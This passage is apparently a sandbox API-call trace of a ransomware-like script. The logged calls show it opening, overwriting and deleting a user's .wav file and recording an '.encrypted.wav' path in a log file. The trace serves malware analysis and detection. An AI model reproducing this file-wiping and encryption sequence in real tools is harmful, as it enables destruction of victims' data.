wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.655] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.655] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.655] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.655] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e39500, ftCreationTime.dwHighDateTime=0x1d5b837, ftLastAccessTime.dwLowDateTime=0xd73a5b0, ftLastAccessTime.dwHighDateTime=0x1d5b641, ftLastWriteTime.dwLowDateTime=0xd73a5b0, ftLastWriteTime.dwHighDateTime=0x1d5b641, nFileSizeHigh=0x0, nFileSizeLow=0x6c09, dwReserved0=0x0, dwReserved1=0x777648, cFileName="xLjsIUwe53RPsLj_a.wav", cAlternateFileName="XLJSIU~1.WAV")) returned 0x7c2100 [0031.655] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.656] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.656] CharLowerBuffW (in: lpsz="byte[27657]", cchLength=0xb | out: lpsz="byte[27657]") returned 0xb [0031.656] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.656] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.656] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.656] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.656] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.656] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.657] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.657] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.658] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.658] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\xljsiuwe53rpslj_a.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0031.658] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.658] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.658] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.658] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.659] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.659] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.659] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.659] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.659] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.659] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.659] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.659] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.659] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.660] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.660] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.660] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.660] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.660] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", lpFilePart=0x0) returned 0x5c [0031.660] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e39500, ftCreationTime.dwHighDateTime=0x1d5b837, ftLastAccessTime.dwLowDateTime=0xd73a5b0, ftLastAccessTime.dwHighDateTime=0x1d5b641, ftLastWriteTime.dwLowDateTime=0x12c265e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c09, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="xLjsIUwe53RPsLj_a.wav", cAlternateFileName="XLJSIU~1.WAV")) returned 0x7c2100 [0031.660] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\xljsiuwe53rpslj_a.wav")) returned 1 [0031.661] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e39500, ftCreationTime.dwHighDateTime=0x1d5b837, ftLastAccessTime.dwLowDateTime=0xd73a5b0, ftLastAccessTime.dwHighDateTime=0x1d5b641, ftLastWriteTime.dwLowDateTime=0x12c265e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c09, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="xLjsIUwe53RPsLj_a.wav", cAlternateFileName="XLJSIU~1.WAV")) returned 0 [0031.661] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.661] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.661] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.661] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.661] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.662] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.662] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.662] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.662] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.662] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.662] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.662] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.662] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.663] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.663] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.663] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x999, lpOverlapped=0x0) returned 1 [0031.663] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.663] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x999, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.663] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.encrypted.wav\r\n", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0031.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x69) returned 0x7db300 [0031.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.encrypted.wav\r\n", cchWideChar=105, lpMultiByteStr=0x7db300, cbMultiByte=105, 